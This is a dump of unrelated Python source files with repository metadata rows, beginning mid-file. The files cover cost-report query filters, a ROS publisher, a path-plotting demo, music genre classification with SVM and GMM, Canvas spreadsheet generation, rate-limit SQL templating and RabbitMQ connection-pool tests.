elif self.time_scope_value == -30:
date_delta = datetime.timedelta(days=30)
else:
date_delta = datetime.timedelta(days=10)
return date_delta
def _get_time_based_filters(self, delta=False):
if delta:
date_delta = self._get_date_delta()
start = self.start_datetime - date_delta
end = self.end_datetime - date_delta
else:
start = self.start_datetime
end = self.end_datetime
start_filter = QueryFilter(field="usage_start", operation="gte", parameter=start.date())
end_filter = QueryFilter(field="usage_end", operation="lte", parameter=end.date())
return start_filter, end_filter
def _get_filter(self, delta=False):
"""Create dictionary for filter parameters.
Args:
delta (Boolean): Construct timeframe for delta
Returns:
(Dict): query filter dictionary
"""
filters = QueryFilterCollection()
# add time constraint filters
start_filter, end_filter = self._get_time_based_filters(delta)
filters.add(query_filter=start_filter)
filters.add(query_filter=end_filter)
return filters
def filter_to_order_by(self, parameters): # noqa: C901
"""Remove group_by[NAME]=* and replace it with group_by[NAME]=X.
The parameters object contains a list of filters and a list of group_bys.
For example, if the parameters object contained the following:
group_by[X] = Y
group_by[Z] = * # removes this line
filter[Z] = L
filter[X] = Y
The returned parameters object would contain lists that look like this:
group_by[X] = Y
group_by[Z] = L # adds this line
filter[Z] = L
filter[X] = Y
Thereby removing the star when there is a filter provided.
Args:
parameters (QueryParameters): The parameters object
Returns:
parameters (QueryParameters): The parameters object
"""
# find if there is a filter[key]=value that matches this group_by[key]=value
for key, value in parameters.parameters.get("group_by", {}).items():
if self.has_wildcard(value):
filter_value = parameters.parameters.get("filter", {}).get(key)
if filter_value:
parameters.parameters["group_by"][key] = filter_value
return parameters
def set_access_filters(self, access, filt, filters):
"""
Sets the access filters to ensure RBAC restrictions given the users access,
the current filter and the filter collection
Args:
access (list) the list containing the users relevant access
filt (list or dict) contains the filters that need
filters (QueryFilterCollection) the filter collection to add the new filters to
returns:
None
"""
for _filt in filt if isinstance(filt, list) else [filt]:
check_field_type = None
try:
if hasattr(self, "query_table"):
# Reports APIs
check_field_type = self.query_table._meta.get_field(_filt.get("field", "")).get_internal_type()
elif hasattr(self, "data_sources"):
# Tags APIs
check_field_type = (
self.data_sources[0]
.get("db_table")
._meta.get_field(_filt.get("field", ""))
.get_internal_type()
)
except FieldDoesNotExist:
pass
_filt["operation"] = "contains" if check_field_type == "ArrayField" else "in"
q_filter = QueryFilter(parameter=access, **_filt)
filters.add(q_filter)
| 34.213483 | 116 | 0.611987 | 1,462 | 12,180 | 4.905609 | 0.19015 | 0.041411 | 0.037089 | 0.020078 | 0.301032 | 0.232989 | 0.198968 | 0.186559 | 0.147239 | 0.147239 | 0 | 0.003959 | 0.29491 | 12,180 | 355 | 117 | 34.309859 | 0.83116 | 0.271921 | 0 | 0.152047 | 0 | 0 | 0.052748 | 0.006271 | 0 | 0 | 0 | 0.002817 | 0 | 1 | 0.116959 | false | 0.005848 | 0.064327 | 0 | 0.321637 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2e4d33ff1712d3173ec4251c6fe16e0f15be96e | 492 | py | Python | week2/scripts/hello_publisher.py | ajaykrishna1878/Robotics-Automation-QSTP-2021 | f5b8626db20a60f9dd923bab5a0bec118d0abc67 | [
"MIT"
] | null | null | null | week2/scripts/hello_publisher.py | ajaykrishna1878/Robotics-Automation-QSTP-2021 | f5b8626db20a60f9dd923bab5a0bec118d0abc67 | [
"MIT"
] | null | null | null | week2/scripts/hello_publisher.py | ajaykrishna1878/Robotics-Automation-QSTP-2021 | f5b8626db20a60f9dd923bab5a0bec118d0abc67 | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
import rospy
from std_msgs.msg import String
class hello:
def __init__(self):
self.word = "Hello,"
self.pub = rospy.Publisher('/hello', String, queue_size=1)
self.rate = rospy.Rate(1)
def publish_word(self):
while not rospy.is_shutdown():
self.pub.publish(self.word)
self.rate.sleep()
if __name__ == '__main__':
rospy.init_node('hello_publisher')
object = hello()
object.publish_word() | 24.6 | 66 | 0.623984 | 64 | 492 | 4.5 | 0.53125 | 0.055556 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008108 | 0.247967 | 492 | 20 | 67 | 24.6 | 0.77027 | 0.042683 | 0 | 0 | 0 | 0 | 0.07431 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0.133333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2e60fefd12f980302a3f8d0677aef2cf55d0964 | 1,348 | py | Python | demos/path/demo_path.py | WisconsinAutonomous/wa_simulator | 405a086b16f262fc82513ca9b23fd040e6375945 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 5 | 2021-02-14T03:56:07.000Z | 2021-12-16T04:46:54.000Z | demos/path/demo_path.py | WisconsinAutonomous/wa_simulator | 405a086b16f262fc82513ca9b23fd040e6375945 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 1 | 2021-02-05T19:30:55.000Z | 2021-02-05T19:51:21.000Z | demos/path/demo_path.py | WisconsinAutonomous/wa_simulator | 405a086b16f262fc82513ca9b23fd040e6375945 | [
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] | 3 | 2021-09-20T21:21:12.000Z | 2022-01-09T20:49:46.000Z | # Simple path demo
# Meant to demonstrate the WA Simulator API
# -----------------------------------------------------------------
# Import the simulator
import wa_simulator as wa
import matplotlib.pyplot as plt
# Command line arguments
parser = wa.WAArgumentParser(use_sim_defaults=False)
parser.add_argument("-p", "--plot", action="store_true", help="Plot the paths", default=False)
args = parser.parse_args()
def main():
# Load data points from a csv file
filename = wa.get_wa_data_file("paths/sample_medium_loop.csv")
points = wa.load_waypoints_from_csv(filename, delimiter=",") * 2
# Create the path
path1 = wa.WASplinePath(points, num_points=1000)
# Create another path
points = [[9, 8, 0.5], [20, 5, 0.5], [25, 15, 0.5], [34, 24, 0.5],
[35, 28, 0.5], [70, 18, 0.5], [130, 98, 0.5]]
path2 = wa.WASplinePath(points, num_points=1000, is_closed=False)
# Create a third path using a json
filename = wa.get_wa_data_file("paths/sample_medium_loop.json")
path3 = wa.create_path_from_json(filename)
# Plot, if desired
if args.plot:
path1.plot("k", show=False)
path2.plot("b", show=False)
path3.plot("r", show=True)
else:
print("'-p' option not passed. Nothing will be displayed. Add '-h' for help.")
if __name__ == "__main__":
main()
| 31.348837 | 94 | 0.626113 | 196 | 1,348 | 4.137755 | 0.505102 | 0.017263 | 0.032059 | 0.036991 | 0.189889 | 0.189889 | 0.108508 | 0.108508 | 0.108508 | 0.108508 | 0 | 0.050645 | 0.194362 | 1,348 | 42 | 95 | 32.095238 | 0.696133 | 0.212908 | 0 | 0 | 0 | 0 | 0.161905 | 0.054286 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045455 | false | 0.045455 | 0.090909 | 0 | 0.136364 | 0.045455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2e6e9f256351ec45645abb75d19744b0bc45894 | 4,684 | py | Python | Practice2/Lab3-2_Genre_Classification.py | kiseyno92/SNU_ML | be48a5c570ef59dc2b5a782c828536e100d7f0eb | [
"MIT"
] | 1 | 2017-08-10T10:16:32.000Z | 2017-08-10T10:16:32.000Z | Practice2/Lab3-2_Genre_Classification.py | kiseyno92/SNU_ML | be48a5c570ef59dc2b5a782c828536e100d7f0eb | [
"MIT"
] | null | null | null | Practice2/Lab3-2_Genre_Classification.py | kiseyno92/SNU_ML | be48a5c570ef59dc2b5a782c828536e100d7f0eb | [
"MIT"
] | null | null | null |
# coding: utf-8
# ### Machine Learning Application - Genre Classification
# UDSL-SNU Big Data Academy
# 20170725
# ##### Import libraries
# In[1]:
import h5py
import numpy as np
import matplotlib.pyplot as plt
from sklearn import cross_validation
from sklearn.preprocessing import StandardScaler
from sklearn.metrics import accuracy_score, confusion_matrix
from sklearn import svm
from sklearn.mixture import GaussianMixture
# ##### Load Data
# In[ ]:
with h5py.File('data/gtzan_mfcc.h', 'r') as f:
X = np.asarray(f['X'])
y = np.asarray(f['y'])
genres = list(f['genres'])
# 1 audio clip has 120 dimensions
# 60 features' mean and std
# >60 features = 20(mfcc + delta_mfcc + double_deta_mfcc)
# In[ ]:
print('X.shape : {}'.format(X.shape))
print('y.shape : {}'.format(y.shape))
# In[ ]:
print('unique y : {}'.format(np.unique(y)))
# In[ ]:
plt.hist(y, range=[0,10])
plt.xlabel('y value')
plt.ylabel('count')
plt.title('Class distribution of GTZAN')
plt.show()
# ##### Train-test split
# In[ ]:
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.2, stratify=y)
# ##### Linear SVM
# In[ ]:
linearSVM = svm.LinearSVC(C=.1, max_iter=100)
linearSVM.fit(X_train, y_train)
# Predicted value from SVM model
# In[ ]:
y_pred_SVM_train = linearSVM.predict(X_train)
y_pred_SVM = linearSVM.predict(X_test)
# In[ ]:
print ('(SVM)train acc : %f'% accuracy_score(y_train, y_pred_SVM_train))
print ('(SVM)test acc : %f'% accuracy_score(y_test, y_pred_SVM))
print ('(SVM)confusion matrix : ')
print (confusion_matrix(y_test, y_pred_SVM))
# ##### GMM model
# The GMM learns the statistical distribution of a particular instance,
# in this case 10 GMMs are required (for 10 genres)
# In[ ]:
unique_class = range(10)
GMMs = dict() # array of GMM for each class
for c in unique_class :
GMMs[c] = GaussianMixture(n_components=32, covariance_type='full',
tol = 0.05, reg_covar=3)
index_gmm = np.where(y_train==c)[0]
GMMs[c].fit(X_train[index_gmm])
# Scoring X using GMM
# In[ ]:
train_scores = list()
test_scores = list()
for c in unique_class :
train_scores.append(GMMs[c].score_samples(X_train))
test_scores.append(GMMs[c].score_samples(X_test))
train_scores = np.asarray(train_scores).T
test_scores = np.asarray(test_scores).T
# In[ ]:
print ('train_scores.shape : {}'.format(train_scores.shape))
# find the index of the highest model
# In[ ]:
y_pred_GMM_train = np.argmax(train_scores, axis=1)
y_pred_GMM_test = np.argmax(test_scores, axis=1)
# In[ ]:
print ('(GMM)train acc : %f'% accuracy_score(y_train, y_pred_GMM_train))
print ('(GMM)test acc : %f'% accuracy_score(y_test, y_pred_GMM_test))
print ('(GMM)confusion matrix : ')
print (confusion_matrix(y_test, y_pred_GMM_test))
# ### Effect of Standardization
# In[ ]:
ss = StandardScaler()
ss.fit(X_train)
X_st_train = ss.transform(X_train)
X_st_test = ss.transform(X_test)
# ##### SVM
# In[ ]:
linearSVM = svm.LinearSVC(C=.1, max_iter=100)
linearSVM.fit(X_st_train, y_train)
y_pred_SVM_train = linearSVM.predict(X_st_train)
y_pred_SVM_st = linearSVM.predict(X_st_test)
print ('(SVM)train acc : %f'% accuracy_score(y_train, y_pred_SVM_train))
print ('(SVM)test acc : %f'% accuracy_score(y_test, y_pred_SVM_st))
print (confusion_matrix(y_test, y_pred_SVM_st))
# ##### GMM
# In[ ]:
unique_class = range(10) # array of GMM for each class
GMMs = dict()
for c in unique_class :
GMMs[c] = GaussianMixture(n_components=32, covariance_type='full',
tol = 0.05, reg_covar=3)
index_gmm = np.where(y_train==c)[0]
GMMs[c].fit(X_st_train[index_gmm])
# scoring X using GMM
train_scores = list()
test_scores = list()
for c in unique_class :
train_scores.append(GMMs[c].score_samples(X_st_train))
test_scores.append(GMMs[c].score_samples(X_st_test))
# find model shows best score
train_scores = np.asarray(train_scores).T
test_scores = np.asarray(test_scores).T
y_pred_GMM_train = np.argmax(train_scores, axis=1)
y_pred_GMM_test_st = np.argmax(test_scores, axis=1)
print ('(GMM)train acc : %f'% accuracy_score(y_train, y_pred_GMM_train))
print ('(GMM)test acc : %f'% accuracy_score(y_test, y_pred_GMM_test_st))
print ('(GMM)confusion matrix')
print (confusion_matrix(y_test, y_pred_GMM_test))
# ### Results
# In[ ]:
print ('baseline')
print ('(SVM)test acc : %f'% accuracy_score(y_test, y_pred_SVM))
print ('(GMM)test acc : %f'% accuracy_score(y_test, y_pred_GMM_test))
print ('Standardization')
print ('(SVM)test acc : %f'% accuracy_score(y_test, y_pred_SVM_st))
print ('(GMM)test acc : %f'% accuracy_score(y_test, y_pred_GMM_test_st))
| 22.411483 | 86 | 0.6962 | 757 | 4,684 | 4.056803 | 0.198151 | 0.039075 | 0.03126 | 0.066428 | 0.593618 | 0.579941 | 0.54803 | 0.509606 | 0.498209 | 0.458157 | 0 | 0.015431 | 0.156063 | 4,684 | 208 | 87 | 22.519231 | 0.761447 | 0.166524 | 0 | 0.45977 | 0 | 0 | 0.116675 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.091954 | 0 | 0.091954 | 0.287356 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2e880113fa2ff93a3ecc07d1b229e383a3a5b72 | 6,023 | py | Python | assignments/assignment_clo_worksheet.py | dgrobani/py3_canvaslmi_api | c02c56a33dd196bdf779039c13bb52aa1e88699d | [
"MIT"
] | 18 | 2017-07-20T20:20:39.000Z | 2021-09-26T20:16:58.000Z | assignments/assignment_clo_worksheet.py | dgrobani/py3_canvaslmi_api | c02c56a33dd196bdf779039c13bb52aa1e88699d | [
"MIT"
] | null | null | null | assignments/assignment_clo_worksheet.py | dgrobani/py3_canvaslmi_api | c02c56a33dd196bdf779039c13bb52aa1e88699d | [
"MIT"
] | 3 | 2018-05-17T12:07:36.000Z | 2021-12-22T23:17:18.000Z | # https://openpyxl.readthedocs.io/
# https://automatetheboringstuff.com/chapter12/
# https://www.ablebits.com/office-addins-blog/2014/09/24/excel-drop-down-list/
# http://stackoverflow.com/questions/18595686/how-does-operator-itemgetter-and-sort-work-in-python
from canvas.core.courses import get_course_by_sis_id, validate_course
from canvas.core.io import get_cmi_clos_by_course, tada
from openpyxl import load_workbook
from openpyxl.formatting.rule import CellIsRule
from openpyxl.styles import Alignment, Font, colors, PatternFill
from openpyxl.styles.borders import Border, Side
from openpyxl.utils import get_column_letter
from openpyxl.worksheet.datavalidation import DataValidation
from canvas.core.assignments import get_assignments
def assignment_clo_worksheet():
courses = {
'2016-2SU-01-NDNP-714-LEC-ONL-O1': ['Paulina', 'Van'],
'2016SS-OAK-UGAOAK1-NURSG-160-LEC1-1': ['Paulina', 'Van', 'NABSN'],
'2016-3FA-02-NABSN-170-LEC-SFP-01': ['Jenny', 'Zettler Rhodes'],
'2016-3FA-01-NBSN-164-LEC-OAK-01': ['Erik', 'Carter'],
'2016-3FA-01-NELMSN-566-LEC-SAC-01': ['Erik', 'Carter'],
'2016-3FA-01-NBSN-108-LEC-OAK-01': ['Christine', 'Rey']
}
for course_sis_id in courses:
template_file = load_workbook('assignment_clo_worksheet.xlsx')
sheet = template_file.get_sheet_by_name(template_file.active.title)
sheet.freeze_panes = 'B1'
sheet.page_setup.fitToHeight = 1
border = Border(left=Side(style='thin'), right=Side(style='thin'),
top=Side(style='thin'), bottom=Side(style='thin'))
sixteen_point = Font(size=16)
dv = DataValidation(type="list", formula1='"Yes,No"', allow_blank=False)
sheet.add_data_validation(dv)
teacher_firstname = courses[course_sis_id][0]
teacher_lastname = courses[course_sis_id][1]
course = get_course_by_sis_id(course_sis_id)
course_sis_info = validate_course(course)
program, number, ctype, campus, section, term, session = \
[course_sis_info[i] for i in ['program', 'number', 'type', 'campus', 'section', 'term', 'session']]
filename = '{}-{}-{}-{}-{}-{}-{}-{}.xlsx'\
.format(program, number, ctype, campus, section, term, session, teacher_lastname)
# header
sheet.cell(row=1, column=1).value = number
sheet.cell(row=2, column=1).value = course_sis_id
sheet.cell(row=3, column=1).value = course['name']
sheet.cell(row=1, column=2).value = term
sheet.cell(row=2, column=2).value = teacher_firstname + ' ' + teacher_lastname
# assignments (graded only)
assignments = get_assignments(course['id'])
for row, assignment in enumerate(sorted(assignments, key=lambda a: "" if not a['due_at'] else a['due_at'])):
if 'not_graded' in assignment['submission_types'] or not assignment['points_possible'] \
or ('omit_from_final_grade' in assignment and assignment['omit_from_final_grade']):
continue
sheet.cell(row=7+row, column=1).value = assignment['name']
sheet.cell(row=7+row, column=1).hyperlink = assignment['html_url']
sheet.cell(row=7+row, column=1).border = border
sheet.cell(row=7+row, column=1).font = sixteen_point
sheet.cell(row=7+row, column=1).font = Font(color=colors.BLUE)
sheet.row_dimensions[7+row].height = 27
# rubric yes/no
sheet.cell(row=7+row, column=2).border = border
sheet.cell(row=7+row, column=2).font = sixteen_point
dv.add(sheet.cell(row=7+row, column=2))
# improvement plan
sheet.cell(row=7+row, column=3).border = border
# plan complete yes/no
sheet.cell(row=7+row, column=4).border = border
sheet.cell(row=7+row, column=4).font = sixteen_point
dv.add(sheet.cell(row=7+row, column=4))
# clos
max_clo_desc_len = 0
# kludge for old sis id format
program = program if len(courses[course_sis_id]) == 2 else courses[course_sis_id][2]
clos = get_cmi_clos_by_course(program, course_sis_info['number'])
for col, clo in enumerate(clos):
sheet.cell(row=6, column=5+col).alignment = Alignment(vertical='top', wrapText=True)
sheet.cell(row=6, column=5+col).value = '{}: {}'.format(clo['clo_title'], clo['clo_description'])
sheet.cell(row=6, column=5+col).border = border
sheet.cell(row=6, column=5+col).font = sixteen_point
max_clo_desc_len = max(len(clo['clo_description']), max_clo_desc_len)
# clo headers [styling merged cells doesn't work in openpyxl]
last_column = 4 + len(clos)
sheet.merge_cells(start_row=4, start_column=5, end_row=4, end_column=last_column)
sheet.merge_cells(start_row=5, start_column=5, end_row=5, end_column=last_column)
# clo column width & row height
sheet.row_dimensions[6].height = max_clo_desc_len / 50 * 36
for column in range(5, last_column + 1):
sheet.column_dimensions[get_column_letter(column)].width = 50
# conditional formatting for x marks the spot
clo_range = 'E7:{}{}'.format(get_column_letter(last_column), 6 + len(assignments))
sheet.conditional_formatting\
.add(clo_range, CellIsRule(operator='greaterThan', formula=['""'], fill=PatternFill(bgColor='70AD47')))
for row in range(7, 7 + len(assignments)):
for column in range(5, last_column + 1):
sheet.cell(row=row, column=column).border = border
sheet.cell(row=row, column=column).alignment = Alignment(horizontal="center", vertical="center")
template_file.save(filename)
if __name__ == '__main__':
assignment_clo_worksheet()
tada()
| 48.96748 | 117 | 0.636062 | 802 | 6,023 | 4.610973 | 0.293017 | 0.055976 | 0.074635 | 0.042185 | 0.268253 | 0.190373 | 0.159816 | 0.091942 | 0.041103 | 0.023256 | 0 | 0.036176 | 0.228956 | 6,023 | 122 | 118 | 49.368852 | 0.760121 | 0.083845 | 0 | 0.023529 | 0 | 0 | 0.113548 | 0.054265 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011765 | false | 0 | 0.105882 | 0 | 0.117647 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2ead67c7bdbd412472810f4cfc5c65925b61e24 | 3,949 | py | Python | curiefense/curielogserver/curielogserver/ratelimitrecommendation.py | fossabot/curiefense | 6941f8aa08bcac1b0cf87c36ddb0037917a38c5a | [
"Apache-2.0"
] | 1 | 2020-11-15T06:27:05.000Z | 2020-11-15T06:27:05.000Z | curiefense/curielogserver/curielogserver/ratelimitrecommendation.py | fossabot/curiefense | 6941f8aa08bcac1b0cf87c36ddb0037917a38c5a | [
"Apache-2.0"
] | 3 | 2022-02-24T09:58:32.000Z | 2022-03-01T20:05:07.000Z | curiefense/curielogserver/curielogserver/ratelimitrecommendation.py | xavier-rbz/curiefense | 44200a90c515fe184e9c66ea662b2643adcbd34e | [
"Apache-2.0"
] | 1 | 2021-01-07T20:51:48.000Z | 2021-01-07T20:51:48.000Z | import yaml
class FeatureAnalysis(object):
def __init__(self, **kwargs):
self.input_params = {}
self.yaml_data = None
self.input_params.update(kwargs)
self.yaml_data = self._load_yaml()
def _load_yaml(self):
'''
Read yaml template from path
@param file_name name of template
return yaml template
'''
full_path = self.input_params['yaml_file_name']
try:
with open(full_path, 'r') as reader:
yaml_content = reader.read()
return yaml.load(yaml_content,Loader=yaml.FullLoader)
except Exception as error:
print('failed loading yaml file {0}'.format(error))
def _validate_input_params(self):
for param in self.yaml_data['input_params']:
name = param['name']
_type = param['type']
# a) validate param provided
if name not in self.input_params:
print('input param name {name} is missing'.format(name=name))
return False
# b) validate param data type
input_type = type(self.input_params[name]).__name__
if input_type != _type:
print('input param name {name} type mismatch got {_type} while expecting {yaml_type}'.format(
name=name, _type=input_type, yaml_type=_type))
return False
return True
def construct_sql(self):
'''
This function completed sql template
'''
valid_input = self._validate_input_params()
if valid_input:
sql_template = self.yaml_data['sql_template']
if sql_template:
try:
return sql_template.format(**self.input_params)
except:
print('failed formatting sql_template from yaml data')
return None
return None
return None
print('failed loading sql_template from yaml data')
def _run_feature(self):
sql = self.construct_sql()
return sql
def run(self):
return self._run_feature()
class RateLimitLocation(FeatureAnalysis):
def __init__(self, **kwargs):
FeatureAnalysis.__init__(self, **kwargs)
key_composition = self.input_params["key_composition"]
include = self.input_params["include"]
exclude = self.input_params["exclude"]
self.input_params["gen_key_composition"] = self._gen_key_composition(key_composition)
self.input_params["gen_include"] = self._gen_include(include)
self.input_params["gen_exclude"] = self._gen_exclude(exclude)
def _gen_key_composition (self,item):
lines = []
def comma2arrow(item):
return "->".join(item[0:-1]) + "->>" + item[-1]
keys = list(map(comma2arrow, item))
def construct_key_composition():
for key in keys:
lines.append("(curiefense->{key})".format(key=key))
return "concat(" + " , ".join(lines) + ")"
key_composition_sql = construct_key_composition()
return key_composition_sql
def _gen_include (self,include_param):
lines = []
def comma2arrow(include_param):
return "->".join(include_param[0:-1]) + "->>" + include_param[-1]
keys = list(map(comma2arrow, include_param))
def construct_include():
for key in keys:
lines.append(" AND (curiefense->{key})".format(key=key))
return " ".join(lines)
return construct_include()
def _gen_exclude (self,exclude_param):
lines = []
def comma2arrow(exclude_param):
return "->".join(exclude_param[0:-1]) + "->>" + exclude_param[-1]
keys = list(map(comma2arrow, exclude_param))
def construct_exclude():
for key in keys:
lines.append(" AND NOT (curiefense->{key})".format(key=key))
return " ".join(lines)
return construct_exclude()
pass
def rate_limit_recommend(input_args):
rate_limloc = RateLimitLocation(**input_args)
result = rate_limloc.run()
return result
| 30.612403 | 109 | 0.627247 | 468 | 3,949 | 5.029915 | 0.198718 | 0.070093 | 0.076466 | 0.02294 | 0.18904 | 0.115548 | 0.068819 | 0.046729 | 0.046729 | 0.046729 | 0 | 0.005464 | 0.258546 | 3,949 | 129 | 110 | 30.612403 | 0.798497 | 0.045075 | 0 | 0.186813 | 0 | 0 | 0.119202 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.186813 | false | 0.010989 | 0.010989 | 0.043956 | 0.43956 | 0.054945 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e2eca23998b33c6bcec131356180963aa665068c | 7,359 | py | Python | tests/test_pool.py | 5uper5hoot/PikaExamples | 9d3ae7918343ed612c253bf410882575033c80d6 | [
"MIT"
] | null | null | null | tests/test_pool.py | 5uper5hoot/PikaExamples | 9d3ae7918343ed612c253bf410882575033c80d6 | [
"MIT"
] | 17 | 2019-01-13T00:18:25.000Z | 2020-03-31T01:18:32.000Z | tests/test_pool.py | 5uper5hoot/PikaExamples | 9d3ae7918343ed612c253bf410882575033c80d6 | [
"MIT"
] | null | null | null | """
***********************************************************************
This code has been sourced from
https://github.com/bninja/pika-pool/blob/master/pika_pool.py
Governed by the following BSD licence sourced from
https://github.com/bninja/pika-pool/blob/master/LICENSE. No copyright
notice is available.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
(1) Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
(2) Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in
the documentation and/or other materials provided with the
distribution.
(3)The name of the author may not be used to
endorse or promote products derived from this software without
specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING
IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
***********************************************************************
"""
from __future__ import unicode_literals
import json
import threading
import time
import uuid
import pika
import pytest
import pikatools.pool as pika_pool
@pytest.fixture(scope="session")
def params():
return pika.URLParameters("amqp://guest:guest@localhost:5672/")
@pytest.fixture(scope="session", autouse=True)
def schema(request, params):
cxn = pika.BlockingConnection(params)
channel = cxn.channel()
channel.queue_declare(queue="pika_pool_test")
consumed = {}
@pytest.fixture(scope="session", autouse=True)
def consume(params):
def _callback(ch, method, properties, body):
msg = Message.from_json(body)
consumed[msg.id] = msg
def _forever():
channel.start_consuming()
cxn = pika.BlockingConnection(params)
channel = cxn.channel()
channel.queue_declare(queue="pika_pool_test")
channel.basic_consume(_callback, queue="pika_pool_test", no_ack=True)
thd = threading.Thread(target=_forever)
thd.daemon = True
thd.start()
@pytest.fixture
def null_pool(params):
return pika_pool.NullPool(create=lambda: pika.BlockingConnection(params))
class Message(dict):
@classmethod
def generate(cls, **kwargs):
id = kwargs.pop("id", uuid.uuid4().hex)
return cls(id=id, **kwargs)
@property
def id(self):
return self["id"]
def to_json(self):
return json.dumps(self)
@classmethod
def from_json(cls, raw):
return cls(json.loads(raw.decode("utf-8")))
class TestNullPool(object):
def test_pub(self, null_pool):
msg = Message.generate()
with null_pool.acquire() as cxn:
cxn.channel.basic_publish(
exchange="", routing_key="pika_pool_test", body=msg.to_json()
)
time.sleep(0.1)
assert msg.id in consumed
@pytest.fixture
def queued_pool(params):
return pika_pool.QueuedPool(
create=lambda: pika.BlockingConnection(params),
recycle=10,
stale=10,
max_size=10,
max_overflow=10,
timeout=10,
)
@pytest.fixture
def empty_queued_pool(request, queued_pool):
queued = [queued_pool.acquire() for _ in range(queued_pool.max_size)]
request.addfinalizer(lambda: [cxn.release() for cxn in queued])
overflow = [queued_pool.acquire() for _ in range(queued_pool.max_overflow)]
request.addfinalizer(lambda: [cxn.release() for cxn in overflow])
return queued_pool
def test_use_it():
params = pika.URLParameters(
"amqp://guest:guest@localhost:5672/?"
"socket_timeout=10&"
"connection_attempts=2"
)
pool = pika_pool.QueuedPool(
create=lambda: pika.BlockingConnection(parameters=params),
max_size=10,
max_overflow=10,
timeout=10,
recycle=3600,
stale=45,
)
with pool.acquire() as cxn:
cxn.channel.basic_publish(
body=json.dumps(
{"type": "banana", "description": "they are yellow"}
),
exchange="",
routing_key="fruits",
properties=pika.BasicProperties(
content_type="application/json",
content_encoding="utf-8",
delivery_mode=2,
),
)
assert "cxn=localhost:5672//" in str(cxn.fairy)
class TestQueuedPool(object):
def test_invalidate_connection(slef, queued_pool):
Message.generate()
with pytest.raises(pika.exceptions.AMQPConnectionError):
with queued_pool.acquire() as cxn:
fairy = cxn.fairy
raise pika.exceptions.AMQPConnectionError
assert fairy.cxn.is_closed
def test_pub(self, queued_pool):
msg = Message.generate()
with queued_pool.acquire() as cxn:
cxn.channel.basic_publish(
exchange="", routing_key="pika_pool_test", body=msg.to_json()
)
time.sleep(0.1)
assert msg.id in consumed
def test_expire(self, queued_pool):
assert queued_pool.recycle
with queued_pool.acquire() as cxn:
expired = id(cxn.fairy.cxn)
cxn.fairy.created_at + queued_pool.recycle
with queued_pool.acquire() as cxn:
assert expired == id(cxn.fairy.cxn)
cxn.fairy.created_at -= queued_pool.recycle + 1
with queued_pool.acquire() as cxn:
assert expired != id(cxn.fairy.cxn)
def test_stale(self, queued_pool):
with queued_pool.acquire() as cxn:
stale = id(cxn.fairy.cxn)
fairy = cxn.fairy
with queued_pool.acquire() as cxn:
assert stale == id(cxn.fairy.cxn)
